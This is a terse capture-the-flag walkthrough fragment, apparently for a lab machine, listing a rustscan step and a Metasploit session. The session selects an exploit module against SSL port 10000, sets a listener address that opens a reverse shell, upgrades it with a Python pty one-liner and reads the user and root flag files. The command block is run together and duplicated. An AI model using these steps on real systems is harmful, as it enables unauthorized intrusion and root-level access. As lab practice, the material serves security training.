Source
rustscan
metasploit
msfconsole -quse 5show optionsset rhost *machine-ip*set ssl trueset rport 10000set lhost *vpn-ip*runwhoamiwhich pythonpython -c "import pty;pty.spawn('/bin/bash')"Last updated
msfconsole -quse 5show optionsset rhost *machine-ip*set ssl trueset rport 10000set lhost *vpn-ip*runwhoamiwhich pythonpython -c "import pty;pty.spawn('/bin/bash')"Last updated
ls -l /homecat /home/dark/user.txtcat /root/root.txt